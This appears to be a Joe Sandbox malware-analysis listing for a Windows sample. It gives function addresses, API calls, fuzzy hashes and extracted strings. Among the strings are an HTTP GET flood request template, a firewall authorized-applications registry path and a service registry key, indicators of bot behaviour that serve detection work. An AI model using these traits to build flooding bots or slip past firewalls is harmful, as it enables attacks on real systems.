Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: AddressCloseCreateFileHandleLibraryLoadModuleNameProcSleepThread
String ID: SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1503743874-621207024
Opcode ID: 8f19a037a4958f9c4e4be2aea23628189e7a365a9e4db52631885ff5fdbb2ecd
Instruction ID: 9c6ffb664d20bb682cef52620ddec7ad9b3dc09c4fee0253c243f4b9eb5d7768
Opcode Fuzzy Hash: 8f19a037a4958f9c4e4be2aea23628189e7a365a9e4db52631885ff5fdbb2ecd
Instruction Fuzzy Hash: C5312671528615BBD762AE219C0EBEF366CDF42301F00452AF8599E0C2DAF45F0A86E9

Function 004043C1 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000032,?,00000000), ref: 004044EC
ExitThread.KERNEL32 ref: 004044F6

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Strings

<6@, xrefs: 00404449, 0040448B
GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00404485
GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00404443

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: CountExitSleepThreadTickrand
String ID: <6@$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo
API String ID: 896407411-1180673266
Opcode ID: 9c0648faaa7c580b1096e69dcd622242baed2352659d7df1ab5bc987a3810d2b
Instruction ID: fa830c5a6accc8db5a56bc8424976762d41b4de0ccec1c973aff273b9f1804e2
Opcode Fuzzy Hash: 9c0648faaa7c580b1096e69dcd622242baed2352659d7df1ab5bc987a3810d2b
Instruction Fuzzy Hash: 0831DBF15043406BE210EB24DC46FFBB3ACEB94305F04093DF645E21C2EA756A0886AB

Function 00403D6B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 87sleepthreadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 00403E83

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(00000005), ref: 00403E6D

Strings

p8@, xrefs: 00403E00
L8@, xrefs: 00403DC7
:8@, xrefs: 00403DDE

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: CountExitSleepThreadTickrand
String ID: :8@$L8@$p8@
API String ID: 896407411-1348165829
Opcode ID: 3e75125e98315a6c303164bdcc62422dc0ac1f7090f3bf2c4196777fe1904896
Instruction ID: c0699dc0de98f8c7b82e62ff3ffffc6daf283feedac10fb4a2c39f1d9fb6e09f
Opcode Fuzzy Hash: 3e75125e98315a6c303164bdcc62422dc0ac1f7090f3bf2c4196777fe1904896
Instruction Fuzzy Hash: 1821F3316043006BE3109B15DD45BABB7EAAFC8705F00093DF689B72C1DAB45A088BDB

Function 00401E9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84librarystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00401C02
CloseHandle.KERNEL32(?), ref: 00401C3F
LoadLibraryA.KERNEL32(PlusCtrl.dll), ref: 00401C52
lstrlenA.KERNEL32(?), ref: 00401EB1

Strings

PlusCtrl.dll, xrefs: 00401C45

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: CloseHandle$LibraryLoadlstrlen
String ID: PlusCtrl.dll
API String ID: 1302537757-3813448905
Opcode ID: 9d6033b6bf4a2c9d292d010c3143f14cd85b7083ffd7105bc62b5e031c1c6f82
Instruction ID: fe13cccd782696a5966384611aa504fe5a24fcd4d90c73c14022dd0c19df5bb8
Opcode Fuzzy Hash: 9d6033b6bf4a2c9d292d010c3143f14cd85b7083ffd7105bc62b5e031c1c6f82
Instruction Fuzzy Hash: 303160715443019BE720CF24DD44E6BB7E8ABC4754F144A2EF9A1A32E0E738E845CB56

Function 00403C60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(00000014), ref: 00403D53
ExitThread.KERNEL32 ref: 00403D65

Strings

p8@, xrefs: 00403D1E
L8@, xrefs: 00403CEB
:8@, xrefs: 00403CFC

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: CountExitSleepThreadTickrand
String ID: :8@$L8@$p8@
API String ID: 896407411-1348165829
Opcode ID: 653889bf93ce3dc5ae69bcf3ca1f034d621d2bbf8dda7ff92a3885e57a6f8e2a
Instruction ID: 61c35c1a6ef796fb9a95b154365f1d274a12748536e75e316c168b2b6ba842ad
Opcode Fuzzy Hash: 653889bf93ce3dc5ae69bcf3ca1f034d621d2bbf8dda7ff92a3885e57a6f8e2a
Instruction Fuzzy Hash: 0321D131244304ABE3249B14DD16B6BB7A9EB84B04F00093DF689A72D1CBB59A08879A

Function 00405980 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000F), ref: 00405A36
ExitThread.KERNEL32 ref: 00405A40

Strings

p8@, xrefs: 00405A02
L8@, xrefs: 004059CF
:8@, xrefs: 004059E0

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: ExitSleepThread
String ID: :8@$L8@$p8@
API String ID: 2532117645-1348165829
Opcode ID: 4ec5ed0947da0d90acb00254561b95d3ed25ab39c8d3cff82c102e6db47b881b
Instruction ID: 5552c68df3c5ec419ed120abdad0def72af0b1e7849d46ccb2dcea0349e472ec
Opcode Fuzzy Hash: 4ec5ed0947da0d90acb00254561b95d3ed25ab39c8d3cff82c102e6db47b881b
Instruction Fuzzy Hash: 45119030244304ABE324DB50DE4AB6B77E9EF85704F00092DF689B61D1DBF49D088B9B

Function 00402AD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(?,SYSTEM\CurrentControlSet\Services\), ref: 00402AF6
lstrcatA.KERNEL32(00000000,100200), ref: 00402B06

Strings

SYSTEM\CurrentControlSet\Services\, xrefs: 00402AE7
F7@, xrefs: 00402B22
100200, xrefs: 00402B00

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
